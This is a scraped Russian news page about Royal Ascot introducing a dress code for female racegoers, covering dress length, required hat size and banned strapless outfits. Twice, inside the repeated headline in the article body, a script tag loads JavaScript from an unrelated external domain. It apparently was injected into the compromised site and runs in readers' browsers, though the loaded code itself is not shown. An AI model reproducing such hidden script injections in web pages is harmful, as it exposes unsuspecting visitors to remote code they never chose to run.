Запрашиваемая страница не найдена USD     CNY     EUR     JPY
Москва C
Последние новости
24 июн 2018, 17:33
По итогам мая российские автолюбители купили 149 машин премиальной марки...
Поиск

Какую марку автомобиля вы предпочитаете?

» » Королевские скачки в Аскоте ввели дресс-код для посетительниц

Королевские скачки в Аскоте ввели дресс-код для посетительниц

24 янв 2012, 09:36    moloshnikova
0 комментариев    9 598 просмотров

Королевские скачки в Аскоте ввели дресс-код <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для посетительниц

Как бы странно это ни звучало, но вскоре на королевских скачках в британском Аскоте будет введен своеобразный фейс-контроль.

Издавна традиционное развлечение британской аристократии – знаменитые скачки, собирало лишь сливки общества. Наряды присутствующих дам после проведения события обсуждала вся страна, и для многих англичанок стиль и модели платьев Аскота становились примером для подражания. Однако сейчас все не так.

Современные конные скачки в Аскоте скорее похожи на парад безвкусицы. Причем каждая из участниц парада стремится обратить на себя внимание публики всеми доступными способами. А престижное спортивное событие, ради которого, собственно, и съезжаются в городок именитые   гости, на фоне такого модного сражения отходит на второй план.

Окончательно вывели из себя устроителей скачек чересчур открытые платья, мини юбки, высокие каблуки и невероятного размера шляпы, которые, к слову, часто становились причиной травм посетителей скачек. Теперь этому модному безумию точно придет конец.
Королевские скачки в Аскоте ввели дресс-код <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для посетительниц
Так, генеральный директор скачек Чарльз Барнетт уже утвердил новый дресс-код. Барнетт отметил, что организаторы мероприятия активно сотрудничали со многими известными дизайнерами и специалистами модной индустрии, чтобы выработать ряд основных правил.

По мнению Чарльза, введение дресс-кода упростит зрительницам выбор платья для скачек и поможет определить верный стиль. Посещение скачек, подчеркивает Барнетт, отнюдь не является поводом надевать свой самый роскошный наряд и подчеркивать таким образом свой статус. В первую очередь гости Аскота должны выглядеть официально, но также не забывать о стиле.

В соответствии с новыми правилами женщинам разрешено надевать юбку или платье длиной от колена и ниже. Каждая посетительница скачек обязана надеть шляпку. Регламентируется также диаметр головного убора: от 10 сантиметров и больше. Это правило автоматически исключает из списка возможных аксессуаров платки и шали, которыми некоторые посетительницы украшали свои головы.

Также запрет наложен на открытые платья без бретелей, наряды с одним открытым плечом или завязкой вокруг шеи. Открытую талию и пупок британским модницам тоже  придется прикрыть. Мужчины королевского корпуса должны посещать мероприятие в сером или черном костюме, дополненном галстуком, жилетом, цилиндром и черными туфлями.

Женщинам основного корпуса разрешаются платки, однако, об открытых платьях все же придется забыть.

Читайте также
25 июл 2009, 09:41    0 комментариев
В американской армии «пополнение». На службу приняты птицы… Птицы-роботы! В Агентстве Перспективных Оборонных Разработок США...
Комментарии
  • bowtiesmilelaughingblushsmileyrelaxedsmirk
    heart_eyeskissing_heartkissing_closed_eyesflushedrelievedsatisfiedgrin
    winkstuck_out_tongue_winking_eyestuck_out_tongue_closed_eyesgrinningkissingstuck_out_tonguesleeping
    worriedfrowninganguishedopen_mouthgrimacingconfusedhushed
    expressionlessunamusedsweat_smilesweatdisappointed_relievedwearypensive
    disappointedconfoundedfearfulcold_sweatperseverecrysob
    joyastonishedscreamtired_faceangryragetriumph
    sleepyyummasksunglassesdizzy_faceimpsmiling_imp
    neutral_faceno_mouthinnocent